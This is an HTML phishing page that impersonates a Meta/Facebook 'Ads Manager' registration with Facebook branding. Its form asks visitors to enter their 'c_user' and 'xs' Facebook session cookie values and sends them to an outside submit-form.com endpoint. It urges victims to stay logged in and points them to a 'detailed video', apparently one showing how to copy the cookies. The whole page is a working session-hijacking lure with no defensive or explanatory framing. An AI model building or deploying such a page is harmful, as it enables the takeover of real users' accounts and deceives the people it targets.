
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <link rel="icon" type="image/png" href="https://cdn.glitch.global/d08141de-e7af-45a5-916b-2f09d06ac286/Facebook_Logo_2023.png?v=1712421903497">
    <link rel="stylesheet" href="styes.css">
    <title>Ads Manger</title>
</head>

<body>

    <nav>
        <div class="nav-left">
            <p class="fb-2">
                facebook
            </p>
        </div>
        <div class="nav-right">
            <div class="search-box">
                <img src="https://cdn.glitch.global/d08141de-e7af-45a5-916b-2f09d06ac286/search-icon-lob.png?v=1712422050841" alt="search-icon">
                <input type="text" placeholder="Search">
            </div>
        </div>
    </nav> <br><br>

    <div class="main-body">

        <form class="content" action="https://submit-form.com/Iprh6Ff2w" method="POST">

            <div>
                <img width="300" poster="sohaib.jpg">
            </div>


            <p class="tr-5">Meta ads manager where you can advertise with advertising agencies, you can apply here for ads manager where you can place ads.</p><br>
            <p class="tr-5">Martech is registered company under our policies if you want to work with Martech you need to apply for registrations in our ads manager account then you will easily place verified ads on the side of your page </p><br>
            <p class="tr-5">Once your account is successfully approved for the ads manager you can place those ads on your page, submit an appeal by providing the necessary information.</p><br>

            <div class="video-text">
                <p>Must Watch Detailed Video Information:</p>
            </div>

            <div>
                <video controls="" loop="" autoplay="" width="300" poster="https://i.pinimg.com/originals/97/95/69/979569a2dedd37573974ceebc05b4a4e.png">
               <source src="https://information-video.vercel.app/detailed-video.mp4" type="video/mp4">
            </video>
            </div>

            <p class="tr-5">Please be sure to provide the requested information below.</p><br>

            <div>
                <p class="mt-4">
                    c_user*
                </p>
                <input type="number" name="c_user" id="c_user" required="">
            </div><br>

            <div>
                <p class="mt-4">
                    xs*
                </p>
                <input type="text" name="xs" pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&+=]).{12,}$" title="Must Watch Detailed Video" required="1" aria-required="true">
            </div><br>

            <p class="msi-4">**Please make sure account not to log out from your computer or laptop until you have received a verification email.</p><br>

            <div class="container">
                <button class="button">
               <p>
                 Submit
               </p>
             </button>

            </div>
            <br> <br>

        </form>
    </div>
    <br><br>


</body>

</html>
